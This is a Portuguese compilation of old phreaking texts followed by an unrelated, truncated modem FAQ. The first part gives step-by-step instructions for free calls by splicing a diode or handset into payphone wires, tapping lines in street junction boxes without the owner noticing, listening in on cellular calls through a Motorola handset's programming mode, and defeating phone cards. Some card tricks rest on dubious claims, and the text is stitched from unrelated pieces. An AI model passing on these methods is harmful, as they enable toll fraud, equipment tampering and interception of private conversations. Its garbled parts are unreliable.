Ditto: Permite interferir e escutar linhas.

Divertor : Redireciona chamadas.

Dloc: Cria um part-fone a partir das linhas que pertençam ao usuário.

Gold: Permite rastrear uma chamada..

Green

Infinity : Intervencão remota de chamadas.

Jack: Jogo de tons.

Light : Emissor AM.

Lunch

Magenta : Conecta uma linha remota de telefone a outra.

Mauve

Neon : Microfone externo.

New Gold : Nova versão da box Gold.

Noise : Cria na linha um barulho.
Olive : Amplia um timbre externo.

Paisley

Party : Cria um part-fone a partir de duas linhas.

Pearl: Gerador de tons.

Pink : Cria um part-fone.

Purple : Um botão de bloqueio no telefone.

Rainbow : Elimina um rastreamento da chamada enviando 120 volts
pela linha.

Razz

Red: Gera tons para realizar chamadas grátis através de cabinas
telefônicas.

Rock : Adiciona música a linha, quando na espera.

Scarlet: Provoca interferências numa linha para provocar uma
recepcião pobre.

Silver: Cria DTMF tons de prioridade A, B, C eD na linha.

Snow: Emite por TV clandestinamente.

Static : Eleva a voltage da linha.

Switch : Adiciona serviços a linha.

Tan : Gravador de conversas telefônicas.

Tron

Urine: Cria alteracões no microfone.

Violet

White
Yellow: Adiciona uma extensão.

Índice

1.3 - Conceitos básicos a respeito de telefonia

2 - Telefones privados

2.1 - Introdução

2.2 - Efetuando ligações de aparelhos sem teclas

3 - Telefones públicos

3.1 - Introdução

3.2 - Efetuando ligações gratuitamente utilizando um diodo

3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum

3.4 - Conectando notebooks a telefones públicos

3.5 - Observação

4 - Caixas de verificação

4.1 - Introdução

4.2 - Efetuando ligações gratuitas de caixas de verificação

5 - Pequena FAQ sobre telefonia

5.1 - É possível tomar um choque mexendo em fios telefônicos?

5.2 - Como faço para fazer chamadas grátis de minha residência?

5.3 - O que é o BINA?

5.4 - Existe alguma maneira de se bloquear o BINA?

5.5 - As famosas "boxes" funcionam aqui no Brasil?

6 - O Autor
6.1 - PGP Key

6.2 - Agradecimentos

6.3 - Como contatar o autor



Aviso

Antes, aquele chavão de sempre: todos os procedimentos descritos
nesse documento são ilegais e podem levar o infrator a cumprir penas
de prisão e/ou pagamento de multas.

Vale lembrar também que eu sou contra qualquer tipo de vandalismo,
e que todo o processo aqui descrito não causa nenhum tipo de dano
aos aparelhos telefônicos. Mesmo a longo prazo.

O cidadão idiota que copiar este documento, totalmente ou em parte,
sem avisar o autor, não passará de um lamer de primeira que não faz
porra nenhuma e tenta enganar os outros mas consegue enganar a si
mesmo.



1.3 - Conceitos básicos a respeito de telefonia

Ao contrário do que muita gente pensa, os fios da linha telefônica
possuem uma tensão contínua equivalente a -48 volts. Esta tensão se
altera para um valor alternado de 96 volts quando o telefone toca.
Portanto, ao lidar com os fios do telefone, tenha o cuidado de não
encostar no orelhão, na parede, ou em qualquer coisa que possa
"aterrá-lo". Este cuidado deve ser redobrado se o telefone for
comunitário ou residencial. Levemos também em consideração que se
o aparelho possuí uma tensão contínua, significa que ele tem também
uma polarização correta (fio positivo e fio negativo). Na instalação do
aparelho esta polarização não faz diferença, mas quando o assunto é
violação, ela deve ser observada.

Vamos lembrar também que existem dois tipos de linhas telefônicas:
A) Decádicas (ou Pulse) - são as linhas dos prefixos mais antigos do
sistema telefônico. A identificação de chamadas se dá através de uma
série de sinais (pulsos), que são interpretados pela central telefônica.

B) Multifrequenciais (ou Tone) - são as linhas dos prefixos mais novos
onde trabalham o serviço de CPA (Central telefônica com controle por
Programa Armazenado). A identificação de chamadas se dá através
da decodificação de tons frequenciais em números.



Seção 2 - Telefones privados



2.1 - Introdução

Nesta seção, explicarei o processo (bem simples) de se efetuar
ligações a partir de telefones sem teclas ou com cadeado, muito
comuns em empresas e ambientes de trabalho.

2.2 - Efetuando ligações de aparelhos sem teclas

Antes de começarmos, precisamos definir o que significa "duração de
um pulso". Um pulso é simplesmente uma interrupção no fluxo de
corrente que circula na linha telefônica, e a sua duração é entendida
como o espaço de tempo decorrido do início ao fim desta interrupção.

Os pulsos enviados pelo aparelho telefônico quando você aperta o
botão de algum número, são iguais ao sinal emitido quando você
coloca o telefone no gancho. A diferenciação é feita pela central
telefônica, usando como referência a duração do pulso. Se ele for um
pouco maior do que 0.5 segundos (aumentar um pouco esse valor
para as linhas mais antigas), a central considera que é um pedido de
linha. Se a duração do pulso for menor do que esse valor, a central irá
considerar que um número a ser discado está sendo enviado.

Para formar os números de 0 a 9, são enviado uma série de pequenos
pulsos em seqüência referentes ao número, ou seja, 2 pulsos para o
número 2, 3 para o número 3 e assim por diante. Para o número 0 são
enviados dez pulsos.
Para simular esses pulsos sem a necessidade de teclas, basta usar o
botão onde se "pega" a linha, aquele onde você coloca o telefone em
cima quando quer terminar uma ligação. Aperte e solte este botão
rapidamente de acordo com o número que você quer discar, espere
um pouco e aperte outra série de vezes de acordo com o outro
número. Lembre-se que para o número 0 deve-se apertar o botão dez
vezes.

Faça isso com todos os números e, ao final, você escutará o tom de
chamada.



Seção 3 - Telefones públicos



3.1 - Introdução

Nesta seção explicaremos alguns métodos de efetuar ligações com
telefones públicos sem a necessidade de se gastar fichas.
Mostraremos também como ligar notebooks a telefones públicos (se é
que existe um hacker que não saiba...).

3.2 - Efetuando ligações gratuitamente utilizando um diodo

O diodo é um componente eletrônico que possui diversas utilizações.
Podemos resumir seu funcionamento basicamente na seguinte
síntese:

Um diodo (ou junção PN), permite que a corrente circule em apenas
uma direção dentro de um circuito.

Ao se utilizá-lo para o fim aqui desejado, vamos precisar de um diodo
IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente
em qualquer casa de componentes eletrônicos. Vamos precisar
também de um resistor com valor nominal de 22K e potência de 1W.

Basta que você ligue o diodo em paralelo com o resistor (conforme
tenta mostrar a ilustração abaixo) e, em seguida, descasque os fios do
telefone e ligue cada uma das pontas obtidas com o diodo e o resistor
neles.

Lembre-se: você vai apenas descascar os fios do orelhão!!! Se você
cortá-los, ele vai ficar sem

linha.



                                      ||

                            || fio do telefone

                                      ||

                                      ||

                  +------------------++-------------------+

                                      ||

                                      ||

                             | +----¦¦¦¦¦¦¦----+ |

                                | / diodo \ |

                ponta +_----------+ +------------_+ ponta

                                    |\/|

                             | +----¦¦¦¦¦¦¦----+ |

                                | resistor |

                                      ||

                  +------------------++-------------------+

                                      ||

                            || fio do telefone
                                  ||

                                  ||

Para executar esta tarefa, eu aconselho que você descasque os fios
dos orelhões que você utiliza com mais freqüência pois, devido ao fato
dos fios do telefone público serem muito grossos, não é um trabalho
que se possa fazer tranqüila e rapidamente sem ser notado.

Você deverá observar também a polarização correta a ser utilizada.
Você perceberá isso facilmente pois, quando você ligar o diodo de
maneira errada, o orelhão vai ficar sem linha.

Uma dica pessoal: os telefones de cabine e os de cartão são mais
fáceis de serem violados. Alguns orelhões comuns tem uma proteção
blindada que impedem o acesso ao cabo telefônico. Embora mesmo
assim seja possível puxar o fio com um gancho, que você enfiará do
lado esquerdo do aparelho telefônico, entre o telefone e uma grade
preta de sustentação que fica atrás dele, eu aconselho que você evite
esses tipos.

Vamos voltar um pouco para a parte técnica da coisa.

O diodo que estamos utilizando vai funcionar da seguinte maneira:

Quando uma ligação é completada de um telefone público, a central
inverte a polarização do telefone de -48 para 48 volts. Quando o
aparelho telefônico percebe isso, ele pede uma fixa. É aí que entra em
funcionamento o nosso querido diodo. Ele permite que a tensão caia
até 0 volts, mas não permite que ela se torne positiva. Dessa forma o
orelhão não vai pedir a ficha.

Nesse caso o resistor está funcionando apenas como um dissipador
de potência, para que você não dê o azar de queimar o diodo (não que
ele seja caro, é que em algumas localidades ele pode ser uma peça
rara que custa R$0,10) e ficar sem telefonar. Mesmo se você não
achar nenhuma loja que venda, pegue uma placa antiga de alguma
coisa que tenha queimado. Elas sempre tem diodos.

Você deve procurar uma peça pequenininha que tem dois terminais, é
preta e normalmente estará escrito IN qualquer coisa.
3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum

Primeiro, você deve tomar os processos citados anteriormente para
descascar os fios do telefone. Em seguida você deve conseguir um
aparelho telefônico comum e ligar cada uma das pontas dos fios dele
nos fios do orelhão.

Para facilitar a sua vida, eu aconselho que o seu telefone seja o menor
possível e que você prenda um jacaré (pequeno gancho achado em
qualquer loja de componentes eletrônicos) em cada uma das pontas
do seu telefone, para facilitar a ligação no orelhão.

Aí é só efetuar a ligação normalmente.

3.4 - Conectando notebooks a telefones públicos

O processo para se conectar notebooks a orelhões, é igual ao de se
conectar telefones comuns. Resumirei nesse item, algumas
considerações a respeito da fiação do notebook, que segue os
padrões da FCC Americana e é um pouco diferente da nossa.

O conector do fio do notebook, que é do tipo jack, tem quatro fios
dentro dele. Arranque o conector de plástico transparente que fica na
ponta do fio, pegue os dois fios centrais e separe-os dos fios das
extremidades.

Estes dois fios centrais, são os que serão utilizados para fazer a
ligação no orelhão. Eu aconselho que você coloque jacarés neles
também.

Basta conectar-se a BBS's da mesma forma que você se conecta em
casa.

Caso você queira testar se está tudo OK, abra um programa de
terminal qualquer e digite o comando ATA, se fizer um barulhinho
parecido com o tom de linha é que está tudo OK.

3.5 - Observação

As chamadas telefônicas se dividem em três categorias: locais, DDD
regionais e interurbanas (ou nacionais).
As chamadas locais são aquelas efetuadas dentro de sua cidade, as
DDD regionais são as ligações feitas dentro do complexo urbano onde
você mora, no caso de São Paulo, as chamadas DDD regionais são
aquelas feitas para as cidades que fazem parte da Grande São Paulo:
Jundiaí, Santo André, São Bernardo, etc. As chamadas interurbanas
são aquelas feitas para fora do complexo urbano onde você está
localizado. Usando São Paulo como exemplo, podemos citar o interior
do estado de São Paulo e cidades localizadas em outros estados.

Os telefones comuns efetuam chamadas locais e DDD regionais, e os
telefones DDD efetuam

chamadas interurbanas, ou seja, para qualquer lugar do Brasil.



Seção 4 - Caixas de verificação



4.1 - Introdução

As caixas de verificação (ou armários na linguagem "técnica" da
TELESP) são caixas de ferro, que geralmente ficam localizadas em
vias públicas, e são utilizadas para se fazer a checagem das linhas do
sistema e identificar problemas antes de se enfiar no subsolo para
tentar resolvê-los.

Tais caixas costumam ser da cor cinza e tem cerca de 1,5 m de altura,
com um código em preto escrito na parte superior.

Elas possuem um grande número de fios telefônicos, todos eles
divididos em pares. Tais caixas podem ser facilmente abertas (se é
que a que você achar já não estiver arrombada), pois geralmente
possuem uma tranca padrão em forma de triângulo que qualquer
chaveiro conhecido pode fazer. Lembre-se que você é um hacker, não
um vândalo. Não vá arrombar a porra da caixa. Isto é coisa pra quem
não tem cérebro. Mesmo se ela estiver trancada com um cadeado. Se
não puder abrir um cadeado ou procurar informação de um método
para abrí-lo, procure outra caixa. Ou então esqueça que você leu esta
seção.
4.2 - Efetuando ligações gratuitas de caixas de verificação

Para se efetuar uma ligação de dentro destas caixas, basta que você
pegue um dos diversos pares de fios que se encontram lá dentro e
ligue eles ao seu pequeno telefone comum portátil ou a um notebook.
Não esqueça de por os fios que você tirou de volta no lugar para que,
nem o pessoal da manutenção e nem o dono da linha, percebam.

Como essas caixas de verificação costumam se situar em vias bem
movimentadas, a prática desse tipo de ligação é desaconselhada.
Mas, como toda a regra tem sua exceção, fica aqui mais uma
informação para você.

Vale lembrar que de caixas de verificação, pode-se efetuar
telefonemas para qualquer lugar, inclusive chamadas internacionais.



Seção 5 - Pequena FAQ sobre telefonia



5.1 - É possível tomar um choque mexendo em fios telefônicos?

Como descrito no item 1.3, os fios telefônicos possuem uma tensão
suficiente para dar choque relativamente forte em uma pessoa. Este
valor de tensão pode atingir um patamar em que ele pode dar um
verdadeiro coice na pessoa, no momento em que a linha envia o sinal
para o telefone tocar.

Isto depende muito da situação e da pessoa. Se você estiver com a
mão no orelhão e mexer nos fios, você provavelmente vai tomar um
choque legal. Se você tiver acabado de comer algo salgado,
provavelmente este choque será ainda mais forte, pois o sal aumenta
a condutividade do seu corpo.

5.2 - Como faço para fazer chamadas grátis de minha residência?

Quando você efetua uma chamada, a central telefônica identifica de
onde você está discando, identifica qual o tipo de telefone que você
está usando (público ou residencial), e então ela arquiva pra onde está
senda feita a ligação e toma as providências necessárias com relação
a cobrança.

Essa identificação é feita na fonte e não por um sinal enviado pelo seu
telefone. Desse modo, é praticamente impossível pra você que está na
sua residência, tentar driblar essa tarifação. Imagine que sua linha
telefônica não passa de um ramal de PABX.

5.3 - O que é o BINA?

O BINA, é um sistema de identificação de chamadas desenvolvido
com tecnologia nacional, que permite a quem está recebendo a
chamada, visualizar o número do telefone de quem está telefonando
para ele.

O esquema teve que ser desenvolvido aqui no Brasil, pois o sistema
telefônico é tão arcaico, que não existiam pacotes prontos para se
adquirir. É como você tentar comprar um Kit Multimídia para um TK-85
ou um MSX.

Tal sistema só funciona em linhas Decádicas, portanto, se você quiser
passar um trote para alguém, procure se certificar qual o tipo de linha
que ela possui. Para isso, basta você dar uma olhada no prefixo e ligar
para a sua companhia telefônica local perguntando se ele suporta
CPA. Se eles falarem que sim, então pode ficar tranqüilo e efetuar a
ligação que você não corre o risco de ser descoberto.

Mas tome cuidado com o que você vai fazer pois, sob ordem judicial,
as companhias locais podem fornecer um rastreamento de chamadas
e assim descobrir de onde você telefonou.

5.4 - Existe alguma maneira de se bloquear o BINA?

Da mesma maneira que a tarifação, o BINA não pode ser driblado do
telefone que você está efetuando a chamada. Quem fornece o número
que vai aparecer no aparelho do receptor, é enviado pela central
telefônica e não pelo seu telefone.

Vale que acrescentar que o sistema não funciona perfeitamente bem e
que às vezes não consegue identificar determinada chamada. Ele
também não identifica chamadas de telefones públicos.
5.5 - As famosas "boxes" funcionam aqui no Brasil?

Como se pode notar nesta seção, o sistema telefônica nacional,
trabalha de maneira centralizada ao contrário do americano que
trabalha de forma distribuída. E não é por acaso, pois, além de
possuírem um número bem maior de linhas telefônicas, os serviços lá
são privatizados e diversas companhias oferecem linhas telefônicas.

A tarifação se dá por diversas identificações enviadas pelos telefones
e diversas centrais distribuídas pelo país. O que os "boxes" fazem, e
driblar esses sinais enviando outros de diversas frequências
diferentes.

Por exemplo, você faz uma chamada internacional mas usa uma "box"
para enviar um sinal para a central de como esta chamada fosse uma
chamada local.

Já de telefones públicos (quem já foi pra lá sabe disso), depois que
você efetua uma chamada, aparece novamente um tom de linha que
fica aguardando o sinal do orelhão que diz que você pagou
determinada taxa para o determinado serviço. Neste caso os "boxes"
enviam os sinais no lugar do orelhão e a chamada é completada.
Esses tipos são conhecidos como Red Boxes, mas não funcionam em
todos os telefones públicos.

Se bem que, ultimamente, as centrais telefônicas estão sendo
substituídas por modelos mais novos. Isto ocorre principalmente em
São Paulo. Mas caso elas permitam o "boxing", isto será um assunto
para um próxima versão desta FAQ.

Arquivos Úteis

Bina (16,4k) - Isso mesmo, aquele aparelho que dá o telefone de
quem esta chamando...

Allboxes (61,3k) - Texto explicativo em inglês de todas as caixas
americanas.

Fazendo Escutas com o PT 550 da Motorola
O sistema de telefonia celular e' altamente vulneravel ao phreaking. E'
simples se fazer escutas telefonicas, e outras coisas como: clonagem
de telefones para se efetuar ligacoes gratuitas, etc. Se voce duvida,
pegue um celular como o famoso e

numeroso PT-550 da motorola. Tire a bateria do celular e note que ha'
tres encaixes metalicos atras do aparelho. Coloque um pedaco de
papel laminado no encaixe do meio e recoloque a bateria. Lique o
telefone (ele esta agora no modo de programacao) e digite:

# 08 # 11 XXXX #

Onde:

#08 Liga o audio de RX (Receptor) #11 Ajusta canal de funcionamento
do ransreceptor XXXX numero do canal (aconselho a voce tentar
numeros abaixo de 800)

Exemplo:

#08#11567#

xTente varias vezes ate encontrar um canal onde haja conversa.
Percebeu? Voce esta fazendo uma escuta em um telefone celular.
Nao requer pratica nem tao pouco habilidade. Vale lembrar que se
algum policial te pegar voce pode ir em

cana. Ha tambem maneiras de se fazer clonagem, isto e, fazer o seu
telefone celular usar a linha de outra pessoa. Eu particularmente
nunca tentei mas, se voce quiser por sua pele a risco, procure pelo
Motorola Bible, ou outros tantos textos existentes por ai. Falando de
maneira simples, um celular e' um radio-transmissor que trabalha com
frequencias na faixa de 800 MHz, e que e' capaz de alternar entre
canais ao receber comandos de um computador conhecido como
Central Switch, que controla o sistema telefonico movel. Pode-se dizer
que um aparelho celular e' dividido em duas partes: O Transceiver
(Transmissor/Receptor) e a cabeca de comando. Entende-se por
cabeca de comando o teclado e seu circuitos de comandos, a NAM e
a ESN. A NAM e' um chip de PROM (Programable Read Only
Memory) que contem informacoes sobre o funcionamento do celular,
como numero, area, etc. Ja a ESN (Eletronic Serial Number) e' um
chip de ROM (Read Only Memory) que armazena um numero
geralmente de 11 digitos octais, referentes a um numero de serie
unico para cada telefone. Existem alguns modelos de celulares que
tem as suas NAM's reprogramaveis pelo proprio teclado do celular.
Outros necessitam que se ligue o celular a computadores



Ouvindo escuta de celulares

Primeiro tire a bateria do seu celular , depois de abrir vão existir umas
partes de metal la embaixo do celular isso mesmo 3 risquinhos de
metal , pegue um pedaço de papel aluminio e bote lá ,dai bote a
bateria e ligue o cel , vai dar um negocio , digite #1008# e é so ouvir
as conversas.

Ligando em orelhões à cartão sem pagar

Truque com o cartão:

As tecnicas que eu uso são 4 agora vc vai conhecelas!

Enganando o telefone publico

Bote o cartão , assim que a pessoa falar ALOW! segure o numero 9 e
retire o cartão

,fique segurando o numero 9 até acabar de falar!

Grafite

O grafite é um material super condutor que conduz energia, e o cartão
funciona

assim , ele tem uns 50 fuziveiszinhos, cada ligação gasta ele queima
um fuzivel,

então o nosso amigo grafite que é condutor de eletricidade, não deixa
queimar os

fuziveis então faça o seguinte atras do cartão,(na parte cinza)
rabisque-a com
força e ,bote no telefone publico e pronto ,mas lembre-se rabisque
com força!

Esmalte de unha incolor

O esmalte impede que esses fuziveis queimem, faça também esse
com os

cartoes de video game (divertilandia)! Passe esmalte na parte de traz
do

cartão ,e no de video game passe na parte da fita magnetica! se você
sabe

mais uma dica mande para mim! pode ter seu nome e seu e-mail aqui!

pegue o cartão telefonico ZERADO dai bote ele de molho na agua

candida, depois de 3 ou 4 dias a tinta do cartão vai sair , depois pegue
papel

aluminio e cubra as partes metalicas com o papel alumi , dai as
ligaçoes

virarão infinitas!




INTRODUÇÃO

Na década de 80, o normal era não se possuir um modem, pois era
um item dispendicioso e de utilidade muito restrita; a velocidade era de
300bps. Aparelhos de fax eram analógicos e raríssimos , a forma de
comunicação "rápida" entre empresas era o Telex, que necessitava de
uma linha especial (não se comunicavam através da linha telefônica),
não permitiam acentuação, caracteres minúsculos, etc. A velocidade
de transmissão era de 50bps (com apenas 5 bits por caracteres ao
invés dos 8 empregados normalmente). Um modem atualmente pode
transmitir 500 caracteres no mesmo tempo que um Telex necessitava
para enviar um único caracter.

Em 1990 poucas empresas e "micreiros" (normalmente engenheiros e
técnicos em eletrônica.. possuíam um modem. Nessa época os
modems possuíam uma velocidade de 1.200 bps e alguns poucos
privilegiados possuíam modems de 2.400 bps. A instalação era difícil,
qualquer ruído na linha telefônica gerava caracteres aleatórios na tela.
Agora, passados apenas seis anos, os modems pelo mesmo custo
são acima de dez vezes mais velozes (14.400 e 28.800 bps e
possuem compressão de dados), se tornaram mais seguros pois
possuem os protocolos de correção de erros e não costumam
apresentar defeitos tão freqüentemente, chegando a oferecer garantia
total de até 5 anos, enviam e recebem fax, e com os programas mais
modernos são de fácil instalação (plug and play), etc.



ÍNDICE

I. MODEMS



[1.0] O que é e como funciona um modem?

[1.1] Quais as diferenças entre bps, baud, cps, etc?

[2.0] O que é CCITT? E ITU-T?

[3.0] O que são Protocolos?

[3.1] O que são os protocolos de modulação?

[3.1.1] Quais são os protocolos de modulação?

[3.1.2] Qual a diferença entre os protocolos V.Fast, V.34 e V.FC?

[3.2] O que e quais são os protocolos de correção de erros?

- V.42 e MNP 2-4
[3.3] O que e quais são os protocolos de compressão de dados?

- V.42bis e MNP 5

- Diferenças entre V.42bis e MNP5

[3.4] O que são modems RPI e por que são mal vistos?

- Softwares que são RPI-compatibles

[3.5] O que são protocolos de transferência de arquivos?

[3.5.1] Quais são os protocolos de transferência mais comuns?

- Xmodem

- Xmodem-CRC

- Xmodem-1k

- Ymodem

- Ymodem-G

- Zmodem

- ZedZap

- Protocolos Bidirecionais

- ASCII

- Kermit

[3.5.2] Quais são os melhores e os piores protocolos de transferência
de arquivos?

[4.0] O que são comandos? Como usá-los?

- O que é padrão Hayes?

- ATD
- ATZ

- +++

- ATA

- Como fazer uma conexão de modems durante uma ligação VOZ?

II. CONFIGURAÇÃO

[1.0] Velocidade serial x Velocidade modem (diferenças entre DTE e
DCE).

- Por que não existe a opção de velocidade "14400" no meu programa
de comunicação? Ela pula de 9600 para 19200...

- O que tem o V.42 e V.42bis a ver com isso?

[2.0] O que é 8N1 e 7E1?

- Qual usar?

[3.0] O que é flow control (RTS/CTS - Xon/Xoff)?

- Qual configuração usar?

[4.0] O que são portas de comunicação e como configurar meu
modem?

[5.0] O que são terminais de comunicação?

- Como funciona o terminal ANSI?

- Que outros terminais existem?

- Qual usar?

[6.0] O que colocar no item Dial String?

- ATDP ou ATDT
III. ESPECIFICO SOFTWARE

[1.0] Quais softwares de operação remota de microcomputadores
existem e quais as diferenças entre eles?

- Lap Link 6.0 for Windows

- PC Anywhere for Windows

- Doorway 2.22 for DOS

- Carbon Copy 6.0 for DOS

[2.0] Video Texto

[3.0] O que é FOSSIL?

IV. ESPECIFICO HARDWARE



[1.0] O que é um chip UART?

- 8250

- 16450

- 16550 (Não "A")

- 16550A, 16550AF e 16550AFN

- Onde está esse chip em meu micro?

- Por que eu precisaria de um UART 16550?

- E o que tem UART 16550 a ver com Windows? E com o OS/2?

[2.0] Qual é a configuração ideal para modems USR Sportster 14.4
kbps?

[3.0] Qual é a configuração ideal para modems USR Sportster 28.8
kbps?
[4.0] Quais as diferenças entre o USR Sportster V.34 e o Courier
V.34?

[5.0] Qual é a configuração ideal para modems Zoltrix NON-RPI?

[6.0] Existem comandos que são bons de se usar em qualquer
configuração? Quais?

[7.0] O que é Caller-ID? O que é BINA? O que relaciona ambos?

[8.0] O que é resposta adaptativa?

[9,0] Modem interno ou externo?

[10.0] Por que não consigo conexões a 9600 bps com meu modem
que diz ser 2400/9600 bps?



V. TENDÊNCIAS FUTURAS

[1.0] WebTV

[1.1] Como funciona?

[2.0] Cable Modem

[3.0] Network Computers

[4.0] Modem Celular

[5.0] O Modem de 56 kbps

[5.1] Caminhos assimétricos

[5.2] Problemas de controle de fluxo

[5.3] Problemas de instalação
I. MODEMS

Essa parte apresenta os tópicos básicos que devem ser conhecidos
sobre como funcionam os modems e o jargão técnico que é usado
nesse contexto.

Ela apresenta os seguintes temas:

1.0 Funcionamento de um modem

1.1 Conceitos de velocidade (bps, baud, cps)

2.0 CCITT e ITU-T

3.0 Protocolos

3.1 Protocolos de modulação

3.2 Protocolos de correção de erros

3.3 Protocolos de compressão de dados

3.4 Modems RPI

3.5 Protocolos de transferência de arquivos

4.0 Comandos Hayes




I.[1.0] O que é e como funciona um modem?

Sabemos que um modem está ligado à linha telefônica e ao
computador. Sabemos também que ele serve para fazer a
comunicação entre o micro e um outro micro através da linha
telefônica.

Surge então a questão, por que um computador não pode transmitir
dados diretamente pela linha telefônica para outro computador. Para
que é necessário o modem?
- O telefone

Vejamos como funciona um telefone comum:

O microfone do bocal converte as ondas de som que vem de sua boca
em sinais elétricos. Do outro lado, o alto falante no fone de ouvido
converte novamente esses sinais elétricos em ondas sonoras. Os
sinais elétricos trafegam pela linha telefônica por meio de oscilações
de voltagem, podendo assim representar as ondas sonoras em sua
freqüencia e altura (amplitude). Esses sinais são chamados de
ANALOGICOS, pois são uma analogia elétrica do som de sua voz.
Pela linha telefônica somente este tipo de sinal pode trafegar.

- O computador e a porta serial

Já o computador se comunica com seus periféricos por meio de bits e
bytes. Um bit é a menor unidade computacional, e aceita dois valores,
ZERO ou UM. Um conjunto de oito bits forma um BYTE. Através das
portas SERIAIS (COMx, normalmente usadas para mouses, modems)
o micro se comunica bit a bit com o periférico, e através das portas
PARALELAS (LPTx, normalmente usadas para impressoras), byte a
byte.

Uma porta serial utiliza sinais elétricos. São voltagens positivas e
negativas (normalmente +12V e -12V) para representar o zero e o um.
Alternando as voltagens, ela pode se comunicar com periféricos
externos bit a bit.

Este sinal é um sinal DIGITAL, com o qual o computador tem grande
facilidade de trabalhar.

- Os modems

Os modelos de modems mais antigos fazem o seguinte: Transformam
essas voltagens positivas e negativas que vêm do micro em tons
audíveis. Uma voltagem negativa (representando um bit 1) é
convertida em um tom de determinado pitch; uma voltagem positiva
(representando um bit 0) em um tom de pitch um pouco mais baixo.
Esses sons são transmitidos pela linha telefônica da mesma forma
como a voz. O modem receptor por sua vez converte esses sons em
sinais digitais e os transfere para o micro, que os interpreta.

Desse processo vem a palavra MODEM, que é a sigla de MOdulador /
DEModulador. Um lado modula os sinais digitais em sinais analógicos,
enquanto o outro lado demodula esses sinais analógicos novamente
para sinais digitais.

- A modulação

Na verdade o termo MODULAÇAO envolve bem mais do que somente
isso. O uso de dois tons visto acima é chamado de modulação FSK.
Com ele, se tem o limite de 300 bits por segundo numa transmissão
de dados.

Modems atuais usam mais do que os dois "estados" possíveis (no
exemplo anterior, cada tom representa um "estado"). Esses modems
mais avançados podem combinar estados (como por exemplo a
amplitude) com mudança de estados (por exemplo a mudança de
fase) afim de representar grupos de dois, três, quatro ou mesmo mais
bits.

I.[1.1] Quais as diferenças entre bps, baud, cps, etc?

O BAUD é uma unidade de medida representando a quantidade de
mudanças de fase por segundo que podem acontecer (por exemplo
numa linha telefônica). As conexões de telefone atuais podem ser
usadas de maneira confiável afim de transmitir um sinal que muda de
estado até 2400 vezes por segundo. Tal conexão está operando a
uma taxa de 2400 bauds.

Mas com técnicas de modulação mais complexas, podemos não ter
apenas dois estados, mas sim muitos estados. Com oito estados
diferentes, podemos usar cada estado para representar um dos oito
grupos possíveis de três bits (000, 001, 010, 011, 100, 101, 110 e
111). Dessa forma, em uma taxa de sinalização de 1600 bauds (por
exemplo), é possível transmitir 4800 bits por segundo (bps). Modems
mais rápidos e mais comuns hoje em dia usam 64 estados, que
podem representar todos os valores possíveis de um grupo de seis
bits. Assim, a 2400 bauds, podem ser transferidos até 14400 bits por
segundo (2400 bauds x 6 bits = 14400 bps).
A diferença entre BAUD e BPS se torna evidente. BAUD é a unidade
de um valor que alcança no máximo algo em torno de 3000 em linhas
telefônicas comuns no Brasil. BPS (bits por segundo) é a velocidade
real do modem nessa linha telefônica, sendo que os modems mais
velozes hoje em dia podem transmitir até 28800 bps (bits por
segundo). Mas para conseguir esses 28800 bps, é necessária uma
taxa de sinalização de aproximadamente 3200 bauds. Como este é
quase o topo máximo que nossas linhas telefônicas alcançam, é
possível que mesmo tendo um modem 28800 bps não se alcance
essa velocidade, mas sim alguma velocidade inferior (26400 bps,
24000 bps ou 21600 bps).

O último termo que ainda não foi abordado é o de CPS. Significa
"caracteres por segundo " e poderia ser chamado também de "byte por
segundo". Esse último termo não é muito usado, pois a sigla deste
seria igualmente BPS, confundindo ela com o "bit por segundo".

Um byte possui normalmente 8 bits. Em transmissões pela porta
serial, são necessários dois bits adicionais, o START e o STOP bit,
totalizando 10 bits. Assim sendo, numa conexão a 14400 bits por
segundo, são transmitidos 1440 cps (caracteres por segundo).
Veremos mais adiante porque esse valor normalmente é ainda maior.

1440 caracteres por segundo é uma velocidade bastante considerável.
Uma pessoa com dotes de digitação médios consegue digitar no
máximo a uns 10 caracteres por segundo, quando muito.

Essa taxa é comumente apresentada em telas de DOWNLOAD e
UPLOADS de programas de comunicação, informando assim quantos
BYTES estão chegando ou saindo por segundo.



I.[2.0] O que é CCITT? E ITU-T?

Vimos que em modems de alta velocidade (como são chamados os
modems a partir com velocidades de 9600 bps e acima) em um baud
são modulados mais de um bit. Agora a forma como esses bits são
modulados, precisou de alguma forma ser padronizado. Se não
houvesse essa padronização, um modem não entenderia o que o
outro estivesse falando, ou seja, um não consegueria demodular o que
outro modulou.

Quem fez grande parte dessa padronização foi um orgão chamado
CCITT, sigla para Comite Consultivo Internacional de Telegrafia e
Telefonia. Este comite definiu uma séria de padrões para a
telecomunicação, que são os padrões chamados de V.xx, onde xx é o
número da padronização.

Desde o começo do ano de 1994 o CCITT não existe mais. Ele foi
substituido ITU-T (International Telephone Union - Setor pra padrões
na telefonia), órgão pertencente à ONU (Organização das Nações
Unidas).

As atividades da ITU incluem a regularização, padronização,
coordenação e desenvolvimento da telecomunicação internacional. A
ITU é basicamente organizada em 3 setores que refletem suas
atividades principais (Padronização, Radiocomunicação e
Desenvolvimento). O que importa para usuários de modems é o Setor
de Padronização da Telecomunicação (ITU-T). Essa agência cria entre
outros as recomendações de padrões para a comunicação de dados.

Com essa padronização, que tem âmbito e validade MUNDIAL, os
modems fabricados pelos mais diversos fabricantes passam a poder
se comunicar entre si sem maiores dificuldades, já que "falam" a
mesma "língua".

Existem ainda outros padrões que não foram definidos pela CCITT
(hoje ITU-T). São por exemplo os padrões Bell, definidos por uma
companhia telefônica americana (Bell), ou o protocolo HST (High
Speed Technology) criado pela USRobotics (nesse caso, só pode
haver conexão de um modem com esse protocolo com outro que
também tenha esse protocolo, no caso, um outro USRobotics HST).
Esses protocolos não têm validade mundial, e portanto não são
encontrados em todos os modems. São os chamados protocolos
proprietários.

Além desses protocolos que definem a modulação para as diversas
velocidades, existem outros tipos de protocolos da ITU-T que
interessam ao universo dos modems, conforme veremos mais adiante
(I.[3.2] e I.[3.3]).
Outros protocolos que não são padrões mundiais (da ITU-T), mas sim
proprietários (criados por uma determinada empresa) eram os
protocolos MNP. Mas esses protocolos entraram em domínio público
(a especificação do protocolo se tornou propriedade pública) e hoje
são encontrados na maioria dos modems de alta velocidade.



I.[3.0] O que são Protocolos?

Hoje em dia os modems não só são mais rápido como também são
repletos de novos aspectos, como controle de erros e compressão de
dados. De repente, você é confrontado com todas essas siglas: V.32,
